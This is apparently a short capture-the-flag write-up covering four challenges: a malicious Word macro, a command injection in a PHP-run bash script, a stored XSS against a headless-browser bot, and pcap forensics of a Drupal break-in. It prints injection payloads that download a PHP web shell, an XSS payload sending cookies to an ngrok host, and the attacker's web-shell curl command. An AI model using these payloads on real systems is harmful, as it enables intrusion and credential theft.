I had solved 6 in the contest, but I had only these 4 solutions written down, so here they are.
Opened .docm file in a VM from Word, read the Macro created.
In the mess found a section where a bunch of variables were being created which printed a URL, but URL had a flag. It encoded using simple Chr(Asc('H')) & Chr(98) ...
Converted it to python code and ran it to get the flag.
Webpage shows multiple buttons with query param sending a string that decides which output to show. Its a function name in a bash file. Bash file is executed by PHP. PHP only trims white space in input command so following works:
list_storage;ls
list_storage;echo${IFS}here;ls
list_storage;/santa_mon.sh${IFS}whoami
list_storage;ls;curl${IFS}https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/index.php${IFS}-o${IFS}static/bg.php;ls
We access static/dg.php and look around. It took sometime and I remembered we have source code :D Source code shows us that we need to call localhost:3000/get_flag and we get the flag.
A webpage uses some animation and starts audio. grep over audio file somehow matches “HTB”, but that’s wrong path.
Download source code files and you understand that every POST request for queries inserts the query into DB and then executes Bot.
Bot turns on puppeteer and tries loading /queries in browser which internally uses handlerbars to render all queries. Before loading /queries in browser, it also sets flag in cookies. Create a simple server (echo server or http-server), and publish it over ngrok. Then sending following payload in POST API call sends a GET request to ngrok with cookies as path param.
{"query": "<script>fetch('http://2a67-139-59-78-128.ngrok.io/asd/ads/' + document.cookie)</script>"}
Need to find the customer who was affected. Opened pcap file using wireshark
Filtered over HTTP coz only that made sense to me.
HTTP request showed an hacker creating web execution shell using PHP exploiting drupal’s registration page as follows:
curl https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/index.php -o bg.php
Hacker creates a new bg.php file and inputs commands in it, last command is to delete a file and replace its contents with a base64 string. Decoding that string gets us flag.